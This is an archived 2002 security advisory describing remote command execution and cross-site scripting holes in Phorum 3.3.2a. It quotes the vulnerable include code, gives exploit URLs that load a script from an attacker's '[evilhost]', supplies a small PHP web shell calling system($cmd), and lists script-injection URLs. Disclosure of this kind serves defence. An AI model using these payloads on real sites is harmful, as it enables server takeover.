21th May 2002 [SBWID-5352]
COMMAND
Phorum remote command execution
SYSTEMS AFFECTED
Phorum 3.3.2a
PROBLEM
Markus Arndt [markus-arndt@web.de] [http://skka.de] found :
1
===
After extracting the Phorum 3.3.2a archive we have lots of php files
and subfolders. I just snooped around a bit and found this file
vulnerable for remote script inclusion:
./plugin/replace/plugin.php
let\'s see some code:
<?php
include(\"$PHORUM[settings_dir]/replace.php\");
function mod_replace_read_body ($body) {
global $pluginreplace;
reset($pluginreplace);
while(list($key,$val) = each($pluginreplace)) {
$body = str_replace($key,$val,$body);
}
return $body;
}
$plugins[\"read_body\"][\"mod_replace\"]=\"mod_replace_read_body\";
?>
Easy one..
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
This one will get the file http://[evilhost]/replace.php and execute
it. If [evilhost] has php enabled we could use this one as replace.php:
<?
echo(\"<?
system(\\\"\\$cmd\\\");
?>\");
?>
If it\'s not php-enabled simply:
<?
system(\"$cmd\");
?>
2
===
Another bug for remote command execution. This time it\'s
admin/actions/del.php :)
Some code:
<?php
require \"$include_path/delete_message.php\";
delete_messages($id);
QueMessage(\"Message(s) $id and all children were deleted!<br>\");
?>
The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
That url will make the script include
http://[evilhost]/delete_message.php
3
===
CSS-Attacks are possible on 2 files..
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert(\"css strikes!\");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert(\"css strikes!\");</script>
SOLUTION
Yes, patch is out.
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
